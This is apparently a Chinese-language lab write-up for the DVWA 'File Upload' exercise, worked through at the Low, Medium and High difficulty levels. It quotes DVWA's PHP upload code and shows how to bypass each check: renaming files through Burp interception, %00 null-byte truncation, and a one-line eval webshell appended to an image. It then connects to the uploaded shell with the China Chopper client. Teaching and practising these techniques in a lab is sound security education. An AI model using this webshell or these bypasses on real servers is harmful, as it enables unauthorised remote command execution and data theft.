File Upload
File Upload,即文件上傳漏洞,通常是由於對上傳文件的類型、內容沒有進行嚴格的過濾、檢查,使得攻擊者可以通過上傳木馬獲取服務器的webshell權限,簡單來說文件上傳是指攻擊者通過上傳可執行腳本功能,從而獲取服務器端可執行命令的權限
本次實驗需要用到中國菜刀 ,所以我們要先下載這個軟件,提供一個下載地址:
http://xiazai.zol.com.cn/detail/44/438518.shtml#comment,友情小提示:點下圖紅框框這里,別點上面的高速要不然它會先自動給你下載個加速器,電信下載就好了,軟件很小只
Low
代碼分析:在上傳文件時,服務器對上傳文件的類型、內容沒有做任何的檢查、過濾,存在明顯的文件上傳漏洞,並且生成上傳路徑后,服務器會檢查是否上傳成功並返回相應提示信息。
文件上傳漏洞限制條件:
- 能夠成功上傳木馬文件
- 上傳文件必須能夠被執行
- 上傳文件的路徑必須可知
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } ?>
先整一個php版本的一句話木馬,注意要是php類型的
上傳
我們可以發現,上傳成功,並返回了服務器的上傳路徑,如下圖:
在中國菜刀右鍵——添加——輸入shell地址:http://192.168.29.76/DVWA-master/hackable/uploads/mua.php(這個shell地址是怎么來的:瀏覽器里你上傳完這個文件,看上面地址,vulnerabilities/upload/#的前面兩個也就是自己的IP和DVWA-master,有的人是dvwa,加上服務器上傳路徑hackable/uploads/mua.php),紅框是剛才php文件里POST后面的密碼
添加成功
可以下載、修改服務器的所有文件
還可以打開終端
Medium
代碼分析:函數對上傳文件的類型和大小作了限制,類型必須是image/jpeg或者image/png,且上傳文件大小不能超過100000B(大約等於97.6KB)
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; // Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?
一、文件上傳+文件包含:
首先我們把剛才的php文件修改為png類型,上傳,成功
現在直接去菜刀肯定連接不上,因為菜刀解析不了png類型的文件
這時就要開始文件包含的操作,在菜刀的添加地址欄中輸入:http://192.168.29.76/DVWA-master/vulnerabilities/fi/?page=hthttp://tp://192.168.29.76/DVWA-master/hackable/uploads/mua.png
理論上就可以拿到web shell,但我嘗試多次沒有連接成功QAQ(咱也不知道為什么,據說是平台原因)
二、利用burpsuite
上傳文件,抓包,把這里改成mua.php
上傳文件,成功
上菜刀進行連接
三、截斷繞過
php版本小於5.3.4的服務器中,當Magic_quote_gpc選項為off(在php.ini里找)時,可以在文件名中使用%00截斷
即可以把上傳文件命名為hack.php%00.png,上傳,抓包,可以看到類型符合要求,並且上傳成功
此時菜刀再連接就可以了
然而我為什么沒有做呢。。。因為我php版本大於5.3.4
High
代碼分析:
增加了strrpos()函數和getimagesize()函數,從源碼中發現對文件上傳的格式做了更加嚴格的限制,要求上傳文件名形式必須是”*.jpg”、”*.jpeg” 、”*.png”其中之一,而且限制了上傳文件的文件頭必須為圖像類型。
strrpos() 函數:查找字符串在另一字符串中最后一次出現的位置。在這里是從文件名中找到含"."的字符
getimagesize()函數:用於獲取圖像大小及相關信息,成功返回一個數組,失敗則返回 FALSE 並產生一條 E_WARNING 級的錯誤信息。
<?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); // File information $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ]; // Is it an image? if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && ( $uploaded_size < 100000 ) && getimagesize( $uploaded_tmp ) ) { // Can we move the file to the upload folder? if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { // No echo '<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo "<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } } ?>
我們需要進行操作,將一句話木馬文件與圖片合並成一個圖片類型的文件,具體如下:
先把圖片文件改后綴名整成txt類型
打開這個txt文件,在最后加入一句話木馬(<?php @eval($_POST['jyx']); ?> )
再改回jpg類型文件
上傳,成功,連接菜刀
http://192.168.29.76/DVWA-master/vulnerabilities/fi/?page=file:///C:/Users/Administrator/Desktop/mua.JPEG